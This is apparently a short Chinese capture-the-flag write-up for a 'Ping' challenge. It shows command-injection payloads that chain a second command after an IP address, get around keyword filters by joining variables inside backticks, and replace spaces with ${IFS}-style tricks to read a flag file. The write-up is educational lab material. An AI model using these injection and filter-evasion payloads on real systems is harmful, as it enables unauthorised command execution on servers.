题目连接:http://ctf.klmyssn.com/challenges#Ping
命令执行绕过,试了试过滤了一些:一些命令
但是反引号可以执行命令
通过拼接,可以拼接出来:ls 命令
127.0.0.1;`a="l";b="s";c=$a$b;$c`
可以发现 flag 就是下面那一串 flag_ 开头的字符串
在拼接命令来查看:
127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`
针对空格过滤,可以使用:
${IFS}
< (也被过滤了)
$IFS
$IFS$9
来代替,但是考虑到在一串字符串中,所以使用 ${IFS} 来代替空格
原文:https://www.cnblogs.com/-chenxs/p/11495607.html